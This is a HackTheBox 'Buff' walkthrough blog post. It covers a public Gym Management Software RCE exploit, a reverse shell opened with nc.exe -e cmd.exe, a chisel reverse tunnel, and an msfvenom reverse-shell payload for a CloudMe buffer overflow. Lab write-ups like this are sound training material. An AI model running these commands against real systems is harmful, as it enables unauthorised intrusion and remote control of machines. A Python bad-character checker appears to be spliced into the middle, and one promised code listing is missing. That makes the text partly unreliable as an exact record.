Buff — HackTheBox writeup

TheNguen
4 min read · Dec 3, 2020

Buff is an easy Windows machine. You gain a foothold on the machine through a CVE with a public exploit for the CMS. The PrivEsc is slightly harder, as it requires you to perform port forwarding in order to leverage a buffer overflow vulnerability. Who would have guessed that a machine named “Buff” would have something to do with a buffer overflow :D

Now let’s get to the meat and potatoes.

Scanning for open ports shows only 8080.

nmap -sC -sV -Pn 10.10.10.198

PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n’s Bro Hut

Navigating to the site on the open port shows a webpage related to fitness.

If you go to the “Contact” menu, you will see the following:

mrb3n’s Bro Hut
Made using Gym Management Software 1.0

We can now search for the CMS name and version with searchsploit or any search engine. Searchsploit finds an “Unauthenticated Remote Code Execution” exploit.

Mirror the exploit.

searchsploit -m php/webapps/48506.py

Next step… LAUNCH THE EXPLOIT.

The shell from the exploit cannot use cd and similar commands, so we need to get a proper shell. We can transfer netcat to the victim machine.

Start http server on the attacker machine.

python -m SimpleHTTPServer 8000

Download nc.exe on the victim.

curl http://10.10.x.x:8000/nc.exe -o nc.exe

You know what follows next…

C:\xampp\htdocs\gym\upload> nc.exe 10.10.x.x 1234 -e cmd.exe

Now we have a better shell which can even use “cd” :D !

Exploring the user folders, you will stumble across CloudMe_1112.exe.

This is intended to lead you to the following CVE.

The thing is that the port used by CloudMe (8888) is only accessible from the localhost.

Therefore we should perform port forwarding. Awesome :D

On our attacker machine we can start a chisel server.

./chisellinux server -p 9001 --reverse

Download chisel on the victim machine and run it as a client.

.\chisel.exe client 10.10.x.x:9001 R:8888:127.0.0.1:8888

On the attacker machine you should see:

[DATE/TIME] server: session#1: tun: proxy#R:8888=>8888: Listening

That should do it for the port forwarding. We can now reach port 8888 on the victim through our own localhost.

This is why in the exploit we would leave the target as: target = "127.0.0.1"

We can now generate the payload in Python format with msfvenom, so we can replace the payload in the exploit found on ExploitDB. The -b option excludes bytes the vulnerable program would treat as terminators (null, carriage return, line feed), which would otherwise cut the payload short.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.x.x LPORT=4321 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
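Before pasting the generated payload into the exploit, it is worth checking that it really contains none of the excluded bytes, because a single stray 0x00, 0x0d or 0x0a would truncate the buffer and the exploit would fail silently. The script below is an added example, not code from the writeup or from the ExploitDB exploit: it parses the `payload += b"..."` listing that `msfvenom -f python -v payload` prints, reassembles the bytes, reports any bad-character offsets, and shows how much of the payload would survive truncation. The two listings are constructed stand-ins (a few plausible opcode bytes), not real shellcode.

```python
import ast
import re

# Bytes the exploit must avoid; matches the -b "\x00\x0d\x0a" passed to msfvenom.
BAD_CHARS = b"\x00\x0d\x0a"

# Constructed stand-in for msfvenom's `-f python -v payload` output (clean).
CLEAN_LISTING = r'''payload =  b""
payload += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x41\x51\x41"
payload += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
'''

# Constructed listing that was generated WITHOUT -b and therefore contains
# bytes the vulnerable program treats as terminators.
BROKEN_LISTING = r'''payload =  b""
payload += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
payload += b"\x41\x51\x41\x50\x52\x51\x56\x48\x0d\x0a"
'''

# Matches lines of the form `name = b"..."` or `name += b"..."`.
LINE_RE = re.compile(r'^\s*(\w+)\s*\+?=\s*(b"(?:[^"\\]|\\.)*")\s*$')


def parse_python_payload(text: str, name: str = "payload") -> bytes:
    """Reassemble the raw bytes from an msfvenom python-format listing.

    Only lines assigning to `name` are used; ast.literal_eval decodes the
    \\xNN escapes exactly as the Python interpreter would in the exploit.
    """
    out = b""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(1) == name:
            out += ast.literal_eval(m.group(2))
    return out


def find_bad_chars(buf: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, value) for every byte of buf that appears in bad."""
    return [(i, buf[i]) for i in range(len(buf)) if buf[i] in bad]


def usable_prefix(buf: bytes, bad: bytes = BAD_CHARS) -> bytes:
    """The part of buf that survives if the target stops at the first bad byte."""
    hits = find_bad_chars(buf, bad)
    return buf if not hits else buf[: hits[0][0]]


def check_listing(text: str) -> dict:
    """Summarise a listing: total length, bad-char hits, and surviving length."""
    buf = parse_python_payload(text)
    hits = find_bad_chars(buf)
    return {
        "length": len(buf),
        "bad_chars": hits,
        "survives": len(usable_prefix(buf)),
        "ok": not hits,
    }


if __name__ == "__main__":
    for label, listing in (("clean", CLEAN_LISTING), ("broken", BROKEN_LISTING)):
        report = check_listing(listing)
        print(f"{label}: {report}")
```

Run it as-is and the clean listing passes, while the broken one reports three nulls at offsets 7 to 9 plus the CR/LF pair at the end, with only 7 of 20 bytes surviving. To check a real msfvenom listing, read it from a file and pass the text to `check_listing`.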

Here is how the code looks after the edit:

Once the exploit is updated with our payload we can start a netcat listener and launch the exploit.

python 48389.py

After a little wait we get a shell on our listener. Good stuff.

We can now read the root flag.

And so the journey to OSCP continues.
